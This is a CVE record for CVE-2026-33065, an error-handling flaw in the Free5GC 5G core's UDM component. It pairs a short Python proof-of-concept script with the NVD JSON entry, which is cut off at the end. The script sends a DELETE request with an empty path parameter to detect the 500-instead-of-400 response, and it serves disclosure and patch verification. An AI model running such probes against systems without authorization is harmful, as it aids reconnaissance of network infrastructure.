CVE-2026-33065

#!/usr/bin/env python3 import requests def check_vulnerability(url): # Construct malicious request with empty supi (double slash) # Example endpoint: /nudm-uecm/v1/{supi} target = f"{url.rstrip('/')}/nudm-uecm/v1//" try: print(f"[*] Sending DELETE request to: {target}") response = requests.delete(target, timeout=10) # Expected behavior for vulnerable system: 500 Internal Server Error # Correct behavior: 400 Bad Request if response.status_code == 500: print("[+] Vulnerability confirmed! Server returned 500 instead of 400.") print(f"[+] Response body: {response.text[:100]}") elif response.status_code == 400: print("[-] System appears patched or not vulnerable (returned 400).") else: print(f"[?] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target_url = "http://localhost:8000" # Replace with actual target check_vulnerability(target_url)

{"cve": {"id": "CVE-2026-33065", "sourceIdentifier": "[email protected]", "published": "2026-03-20T08:16:12.430", "lastModified": "2026-03-23T18:32:57.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Free5GC is an open-source Linux Foundation project for 5th generation (5G) mobile core networks. In versions prior to 1.4.2, the UDM incorrectly converts a downstream 400 Bad Request (from UDR) into a 500 Internal Server Error when handling DELETE requests with an empty supi path parameter. This leaks internal error handling behavior and makes it difficult for clients to distinguish between client-side errors and server-side failures. When a client sends a DELETE request with an empty supi (e.g., double slashes // in URL path), the UDM forwards the malformed request to UDR, which correctly returns 400. However, UDM propagates this as 500 SYSTEM_FAILURE instead of returning the appropriate 400 error to the client. This violates REST API best practices for DELETE operations. The issue has been patched in version 1.4.2."}, {"lang": "es", "value": "Free5GC es un proyecto de código abierto de la Linux Foundation para redes centrales móviles de quinta generación (5G). En versiones anteriores a la 1.4.2, el UDM convierte incorrectamente una solicitud 400 Bad Request descendente (del UDR) en un error 500 Internal Server Error al manejar solicitudes DELETE con un parámetro de ruta 'supi' vacío. Esto expone el comportamiento interno de manejo de errores y dificulta a los clientes distinguir entre errores del lado del cliente y fallos del lado del servidor. Cuando un cliente envía una solicitud DELETE con un 'supi' vacío (por ejemplo, barras dobles // en la ruta URL), el UDM reenvía la solicitud malformada al UDR, el cual devuelve correctamente un 400. Sin embargo, el UDM propaga esto como 500 SYSTEM_FAILURE en lugar de devolver el error 400 apropiado al cliente. Esto viola las mejores prácticas de la API REST para operaciones DELETE. El problema ha sido parcheado en la versión 1.4.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:udm:*:*:*:*:*:go:*:*", "versionEndExcluding": "1.4.2", "matchCriteriaId": "C4C4212B-95F4-49DD-B6DA-F6DF4D8D7257"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/783", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-958m-gxmc-mccm", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/free5gc/udm/commit/88de9fa74a1b3f3522e53b4cfa2d184712ffa4ee", "source": "[email protected]", "tags": ["Patch"]}, {" ... (truncated)